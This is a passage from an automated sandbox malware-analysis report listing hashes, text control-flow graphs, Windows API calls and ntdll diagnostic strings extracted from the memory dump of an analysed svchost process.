                                                                                            • Opcode Fuzzy Hash: 334d6813db9daf9f5c216bef16ef87c1c2013ed93ad0fbf0ae15e470e99e1be9
                                                                                            • Instruction Fuzzy Hash: DB90023120140813D111B2584544747400E87D0341FD6C413A042455CD9B5A8A52A131

                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: d5ee4f6d8d11858e2d1cd9e3d3ddf78f1b145d0eec5019eb36dc6f777ecdca83
                                                                                            • Instruction ID: 0e7ba57bbf08f8cf937e094f7acc73fd8ddafe8b40a69fe4d4d08c4816e25e7f
                                                                                            • Opcode Fuzzy Hash: d5ee4f6d8d11858e2d1cd9e3d3ddf78f1b145d0eec5019eb36dc6f777ecdca83
                                                                                            • Instruction Fuzzy Hash: 9201E5B2E0021CBEDF11ABE18C81DEF7B7CDF51398F448069FA00A7140D2784E068BA5

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 0 413fe8-413ff1 1 413ff3-413ff6 0->1 2 414068 0->2 3 413ff8-414006 1->3 4 41406b-414070 1->4 5 4140aa-4140af 2->5 8 41400a-41400b 3->8 4->5 6 4140b1-4140bb 5->6 7 414128-41412d 5->7 10 41414d-414153 7->10 11 41412f-41413e PostThreadMessageW 7->11 8->8 9 41400d-414016 8->9 12 414018-41401f 9->12 13 41402c 9->13 11->10 14 414140-41414a 11->14 12->13 13->2 14->10
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 0-3950405932
                                                                                            • Opcode ID: 4846ca9941c05f8e5ca39dd9d35e072b570077bafd5b6e33e6bd8f103d25cd31
                                                                                            • Instruction ID: 66b714226c07f6b76023ae766c3cef4c6528fc64ce335d79881f425706831973
                                                                                            • Opcode Fuzzy Hash: 4846ca9941c05f8e5ca39dd9d35e072b570077bafd5b6e33e6bd8f103d25cd31
                                                                                            • Instruction Fuzzy Hash: 230144376881447AD710ADDD98839FBFBACDBC6398B518297EA08D7602D10BCC834389

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 30 4140c3-4140d5 31 4140dd-41412d call 42f2d3 call 417883 call 404853 call 424f93 30->31 32 4140d8 call 42e8c3 30->32 42 41414d-414153 31->42 43 41412f-41413e PostThreadMessageW 31->43 32->31 43->42 44 414140-41414a 43->44 44->42
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: e35a5a336d0d5c8e35208002c41e4b4730ec2d6454b82b5d95015dc8577cfaad
                                                                                            • Instruction ID: e7941c6ec000e6bde019c2bf81c06eaf8e375d9f5103b3bd5938ddd83ce7a6dc
                                                                                            • Opcode Fuzzy Hash: e35a5a336d0d5c8e35208002c41e4b4730ec2d6454b82b5d95015dc8577cfaad
                                                                                            • Instruction Fuzzy Hash: F101DBB1D0021C7ADB01ABD19C81DEF7B7CDF41798F448069FA0477141D6784E0687B5

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 45 414082-414100 47 414107-41412d call 424f93 45->47 48 414102 call 404853 45->48 52 41414d-414153 47->52 53 41412f-41413e PostThreadMessageW 47->53 48->47 53->52 54 414140-41414a 53->54 54->52
                                                                                            APIs
                                                                                            • PostThreadMessageW.USER32(K4394f5,00000111,00000000,00000000), ref: 0041413A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MessagePostThread
                                                                                            • String ID: K4394f5$K4394f5
                                                                                            • API String ID: 1836367815-3950405932
                                                                                            • Opcode ID: 0fa9b623b37576010f7740d62fe919582528553f5203a7cb275bfc36e0c969bc
                                                                                            • Instruction ID: 77e02313ef0d106aaa381f273370259dcc70c8e69cf0be2693f522135ed40cc4
                                                                                            • Opcode Fuzzy Hash: 0fa9b623b37576010f7740d62fe919582528553f5203a7cb275bfc36e0c969bc
                                                                                            • Instruction Fuzzy Hash: 8CF0E9B290115C7A9F019AE19C81CFFB76CDED1398B44807AFA04E7200D2384E4247A5

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 199 4178fe-4178ff 200 417901-417939 199->200 201 4178be-4178c0 199->201 202 4178d0-4178e1 call 42dea3 201->202 203 4178c2-4178cd call 42fdc3 201->203 211 4178e3-4178f7 LdrLoadDll 202->211 212 4178fa-4178fd 202->212 203->202 211->212
                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 4a53ede1bae45f6d398f4179464cd6ca97a25b6859c0e85a43f19cf707b38f3e
                                                                                            • Instruction ID: a90f654782f61fbd6731bfaa855a72fbb800df32093ff9bff96c7bdb7bf5be36
                                                                                            • Opcode Fuzzy Hash: 4a53ede1bae45f6d398f4179464cd6ca97a25b6859c0e85a43f19cf707b38f3e
                                                                                            • Instruction Fuzzy Hash: F90149B1A0410A7BEB11EAA09C45FDFB7BCDB51208F40426BF8059B281E235DAC9C795

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 234 42cad3-42cb17 call 4048e3 call 42d993 RtlFreeHeap
                                                                                            APIs
                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,758B0C7D,00000007,00000000,00000004,00000000,0041710C,000000F4), ref: 0042CB12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FreeHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3298025750-0
                                                                                            • Opcode ID: 63c99f41b55af0cd1ca8660b25d072d20ec73afde797f6f0de5d689eeeccac8e
                                                                                            • Instruction ID: c0661d8aed1aa1d3c53c115302787f5fb8ab18bfce10d22f5e32284c0c1dae7b
                                                                                            • Opcode Fuzzy Hash: 63c99f41b55af0cd1ca8660b25d072d20ec73afde797f6f0de5d689eeeccac8e
                                                                                            • Instruction Fuzzy Hash: 1AE06DB62042057BD710EE59EC41EAB77ADEFC9710F00442DF908A7241CA71BA1087B8

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 229 42ca83-42cac4 call 4048e3 call 42d993 RtlAllocateHeap
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(?,0041E69E,?,?,00000000,?,0041E69E,?,?,?), ref: 0042CABF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 2f79453456b372df221fd68e69f98eb51f856ab049541b41314eb8c6b47891b1
                                                                                            • Instruction ID: b3df10513e966b1ded1cce422b4e8743eeca37dbb7146ca7b83c8e2e31e65d0c
                                                                                            • Opcode Fuzzy Hash: 2f79453456b372df221fd68e69f98eb51f856ab049541b41314eb8c6b47891b1
                                                                                            • Instruction Fuzzy Hash: 22E06DB62002147BDB10EE5AEC41FDB77ADEFC9710F004429FA08A7241C671B91087B8

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 244 42cb23-42cb5f call 4048e3 call 42d993 ExitProcess
                                                                                            APIs
                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,8006066B,?,?,8006066B), ref: 0042CB5A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 63b94393ee37b62b4f51706b440d581d5114a9a80b6208d11f54f6c77f1153ca
                                                                                            • Instruction ID: 522595a57dd4c80dd30431028f84abfbbfa4f2b893a379ce3d26f53a246e2515
                                                                                            • Opcode Fuzzy Hash: 63b94393ee37b62b4f51706b440d581d5114a9a80b6208d11f54f6c77f1153ca
                                                                                            • Instruction Fuzzy Hash: 82E046BA2002147BD220BA9ADC02F9B776DDBC5754F00442AFA08A7242C770BA0186F5

                                                                                             Control-flow Graph (basic blocks and edges as text; executed / not-executed node colouring of the rendered graph is not preserved)
                                                                                             control_flow_graph 249 3a72c0a-3a72c0f 250 3a72c11-3a72c18 249->250 251 3a72c1f-3a72c26 LdrInitializeThunk 249->251
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                                            • Instruction ID: 6f5e2efa675efa3c8a7ba8ee2e8f84cee8cd93609338ab83b39bb35e1f488e02
                                                                                            • Opcode Fuzzy Hash: 52fc328b12e02d0848c86f9ef43994524745637387dbef4d8dbd7cdaff7024fe
                                                                                            • Instruction Fuzzy Hash: 6AB09B719015C5C5DA11F7604A4C717790967D0701F5AC477D3030645E473DC5D1E175
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2160512332
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-3089669407
Strings
• Address of the debug info found in the active list., xrefs: 03AA54AE, 03AA54FA
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA540A, 03AA5496, 03AA5519
• 8, xrefs: 03AA52E3
• Thread identifier, xrefs: 03AA553A
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54E2
• Critical section debug info address, xrefs: 03AA541F, 03AA552E
• double initialized or corrupted critical section, xrefs: 03AA5508
• Critical section address., xrefs: 03AA5502
• Thread is in a state in which it cannot own a critical section, xrefs: 03AA5543
• Critical section address, xrefs: 03AA5425, 03AA54BC, 03AA5534
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03AA54CE
• Invalid debug info address of this critical section, xrefs: 03AA54B6
• undeleted critical section in freed memory, xrefs: 03AA542B
• corrupted critical section, xrefs: 03AA54C2
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
• API String ID: 0-360209818
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
• API String ID: 0-3591852110
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
• API String ID: 0-3197712848
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
• API String ID: 0-3532704233
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
• API String ID: 0-1357697941
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
• API String ID: 0-3063724069
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• @, xrefs: 03A2D0FD
• @, xrefs: 03A2D313
• @, xrefs: 03A2D2AF
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03A2D0CF
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03A2D262
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03A2D146
• Control Panel\Desktop\LanguageConfiguration, xrefs: 03A2D196
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03A2D2C3
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
• API String ID: 0-1356375266
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
• API String ID: 0-664215390
Strings
• @, xrefs: 03A49EE7
• minkernel\ntdll\sxsisol.cpp, xrefs: 03A97713, 03A978A4
• Status != STATUS_NOT_FOUND, xrefs: 03A9789A
• [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03A976EE
• Internal error check failed, xrefs: 03A97718, 03A978A9
• !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03A97709
• sxsisol_SearchActCtxForDllName, xrefs: 03A976DD
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
• API String ID: 0-761764676
Strings
Memory Dump Source
• Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                            • API String ID: 0-523794902
                                                                                            • Opcode ID: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                                            • Instruction ID: d7b6a3aed338b33dc7b3751e45d7c2ed532e8014a0644a1eecbbd35f2054a1e6
                                                                                            • Opcode Fuzzy Hash: 16c4044031f5d8853c8f4f70e4662a210e4548c60b4a0dba66b783665b19f433
                                                                                            • Instruction Fuzzy Hash: D242CC75608391DFC715EF28C984A2ABBF5FF89604F084A6FE8968B391D734D841CB52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                            • API String ID: 0-122214566
                                                                                            • Opcode ID: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                                            • Instruction ID: 7495ef8efd58544266c5bc43d8eb5401155a8a98af24a1ddc3ce7af080772324
                                                                                            • Opcode Fuzzy Hash: 7c0c5fecb97aff0ff6f48800748cf3a0e728a147769c3cceb80d62d223ef7d2e
                                                                                            • Instruction Fuzzy Hash: F6C12B35A00215ABDF24CB69C880BBEB7B9AFD5310F18416FE845AF791E7B4D944C3A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-792281065
                                                                                            • Opcode ID: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                                            • Instruction ID: 85e0079dcac2be84fcc564ce788137faf3e53201d336056493d273d4c4c2c2fd
                                                                                            • Opcode Fuzzy Hash: 734dff4960eda31b954d31bdc0b14f960f73679e7c349e9349c32ff42e6814ff
                                                                                            • Instruction Fuzzy Hash: C6915836A00B149FDB34EF19DA48BAEB7B4FB55B18F08066FE8146B791D7B49801C790
                                                                                            Strings
                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 03AA81E5
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 03AA8181, 03AA81F5
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 03A6C6C3
                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 03AA8170
                                                                                            • LdrpInitializeImportRedirection, xrefs: 03AA8177, 03AA81EB
                                                                                            • LdrpInitializeProcess, xrefs: 03A6C6C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-475462383
                                                                                            • Opcode ID: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                                            • Instruction ID: 680eb332a7dee1985c71fd4fa187afdd8fdb8fa68a86f553cd3659e7cfe6deaa
                                                                                            • Opcode Fuzzy Hash: 00b0c24b626c3f31de59535f5be230b379cf9ba889448194c91431231c13b874
                                                                                            • Instruction Fuzzy Hash: 8331F77A644701AFC224EF2CDE45E2AB7A4EF84B24F04095AF8855B391D724EC04C7A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                            • API String ID: 0-3127649145
                                                                                            • Opcode ID: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                                            • Instruction ID: 3206126e9fc6a719954f92e822b291ea42a7303bf0b96b2a9f26db4c3c63b0c3
                                                                                            • Opcode Fuzzy Hash: 3398d8dea2242e0086e6b4aeecfd57d2118ad879b6e1b9867c5e640d79389e08
                                                                                            • Instruction Fuzzy Hash: AE325675A007199BDB60DF25CD88BDAB7F8FF48300F1046EAE509AB251DB70AA84CF50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                            • API String ID: 0-3393094623
                                                                                            • Opcode ID: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                                            • Instruction ID: f9b7b65b0dadf3073d1539f0a459caae53b5e913938f7574ea912c36683f73f8
                                                                                            • Opcode Fuzzy Hash: 33ae96f6f1ba073717aad32fb8344dc0e30a9e74e46f4e1ddd09baa487c9d5b6
                                                                                            • Instruction Fuzzy Hash: 0A0257719083418FD720CF64C184BABBBE5BFC9704F48892FE9999B250E770D855CBA2
                                                                                            Strings
                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 03A55247
                                                                                            • WindowsExcludedProcs, xrefs: 03A5522A
                                                                                            • Kernel-MUI-Language-SKU, xrefs: 03A5542B
                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 03A5527B
                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 03A55352
                                                                                            Memory Dump Source
